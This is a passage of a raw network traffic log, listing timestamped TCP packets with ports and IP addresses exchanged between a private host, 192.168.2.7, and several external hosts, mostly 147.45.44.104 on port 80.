Sep 27, 2024 01:38:21.602636099 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.602648020 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.602670908 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.602724075 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.603230953 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.603281975 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.603344917 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.696926117 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.696943998 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.696959972 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.697001934 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.697287083 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.697344065 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.697462082 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.697485924 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.697500944 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.697518110 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.697524071 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.697535038 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.697550058 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.697562933 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.697566986 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.697581053 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.697590113 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.697618961 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.698148012 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.698163033 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.698178053 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.698215961 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.698216915 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.698234081 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.698271036 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.698273897 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.698287964 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.698302031 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.698307037 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.698332071 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.698379993 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.698394060 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.698410988 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.698431015 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.698937893 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.698990107 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.699023008 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.699047089 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.699064016 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.699074984 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.699109077 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.699155092 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.699158907 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.699188948 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.699223995 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.699225903 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.699275970 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.699306965 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.699337959 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.699352026 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.699378014 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.699407101 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.699440002 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.699472904 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.699515104 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.699518919 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.699553013 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.699604034 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.731683016 CEST	80	49747	45.132.206.251	192.168.2.7
Sep 27, 2024 01:38:21.731789112 CEST	49747	80	192.168.2.7	45.132.206.251
Sep 27, 2024 01:38:21.804527998 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.804582119 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.804630995 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.804661989 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.804675102 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.804696083 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.804728985 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.804753065 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.804779053 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.804786921 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.804814100 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.804847002 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.804857016 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.804883003 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.804940939 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.806073904 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.806138992 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.806171894 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.806188107 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.806206942 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.806238890 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.806271076 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.806288004 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.806304932 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.806337118 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.806341887 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.806377888 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.806401014 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.806423903 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.806489944 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.806530952 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.806564093 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.806615114 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.806648970 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.806665897 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.806699991 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.806735039 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.806767941 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.806775093 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.806796074 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.806801081 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.806835890 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.806845903 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.806869030 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.806907892 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.806925058 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.806938887 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.807086945 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.876941919 CEST	443	49748	188.114.97.3	192.168.2.7
Sep 27, 2024 01:38:21.877099991 CEST	443	49748	188.114.97.3	192.168.2.7
Sep 27, 2024 01:38:21.879230022 CEST	49748	443	192.168.2.7	188.114.97.3
Sep 27, 2024 01:38:21.890170097 CEST	49748	443	192.168.2.7	188.114.97.3
Sep 27, 2024 01:38:21.890170097 CEST	49748	443	192.168.2.7	188.114.97.3
Sep 27, 2024 01:38:21.890192032 CEST	443	49748	188.114.97.3	192.168.2.7
Sep 27, 2024 01:38:21.890216112 CEST	443	49748	188.114.97.3	192.168.2.7
Sep 27, 2024 01:38:21.894412994 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.894450903 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.894505978 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.894545078 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.894561052 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.894577980 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.894593954 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.894609928 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.894623041 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.894656897 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.894718885 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.894778967 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.894794941 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.894813061 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.894825935 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.894829035 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.894850016 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.894905090 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.894959927 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.895034075 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.895083904 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.895920038 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.896012068 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.896028996 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.896059990 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.896131992 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.896157026 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.896173000 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.896177053 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.896188021 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.896205902 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.896220922 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.896226883 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.896235943 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.896246910 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.896295071 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.904274940 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.904330969 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.904361963 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.904417992 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.904418945 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.904455900 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.904479027 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.904495001 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.904544115 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.904550076 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.904583931 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.904618979 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.904633045 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.904661894 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.904681921 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.904687881 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.904741049 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.904772997 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.904789925 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.904804945 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.904855013 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.931413889 CEST	49749	443	192.168.2.7	104.21.77.130
Sep 27, 2024 01:38:21.931449890 CEST	443	49749	104.21.77.130	192.168.2.7
Sep 27, 2024 01:38:21.931586981 CEST	49749	443	192.168.2.7	104.21.77.130
Sep 27, 2024 01:38:21.936903954 CEST	49749	443	192.168.2.7	104.21.77.130
Sep 27, 2024 01:38:21.936930895 CEST	443	49749	104.21.77.130	192.168.2.7
Sep 27, 2024 01:38:21.984776020 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.984806061 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.984823942 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.984849930 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.984867096 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.984883070 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.984878063 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.984899044 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.984918118 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.984935045 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.984982967 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.984982967 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.984982967 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.985040903 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.985059023 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.985080957 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.985095978 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.985129118 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.985129118 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.986262083 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.986289978 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.986305952 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.986361980 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.986361980 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.986386061 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.986404896 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.986421108 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.986434937 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.986452103 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.986479044 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.986494064 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.986494064 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.986494064 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.986522913 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.986542940 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.986586094 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.994822979 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.994846106 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.994860888 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.994875908 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.994893074 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.994909048 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.994919062 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.994919062 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.994925976 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.994941950 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.994956017 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.994959116 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.994976044 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.994982958 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.994995117 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.995016098 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:21.995047092 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:21.995071888 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.074882030 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.074903011 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.074918985 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.074947119 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.074959993 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.074975967 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.074990034 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.074987888 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.075005054 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.075022936 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.075068951 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.075072050 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.075072050 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.075073004 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.075112104 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.075220108 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.075234890 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.075252056 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.075263977 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.075297117 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.075331926 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.076174974 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.076217890 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.076230049 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.076255083 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.076270103 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.076277018 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.076313019 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.076375008 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.076391935 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.076406002 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.076440096 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.076447964 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.076482058 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.076507092 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.076523066 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.076567888 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.076683044 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.076699018 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.076720953 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.076761007 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.076761961 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.085067987 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.085088015 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.085112095 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.085125923 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.085139990 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.085149050 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.085161924 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.085177898 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.085179090 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.085196018 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.085201979 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.085212946 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.085228920 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.085244894 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.085247040 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.085259914 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.085285902 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.085310936 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.165473938 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.165524960 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.165597916 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.165620089 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.165652990 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.165688038 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.165720940 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.165740013 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.165752888 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.165766001 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.165788889 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.165833950 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.165837049 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.165872097 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.165903091 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.165925026 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.165935040 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.165967941 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.166002035 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.166013956 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.166105032 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.166726112 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.166933060 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.166965961 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.167000055 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.167017937 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.167083025 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.167114973 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.167143106 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.167148113 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.167169094 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.167181015 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.167232990 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.167258024 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.167361975 CEST	80	49743	147.45.44.104	192.168.2.7
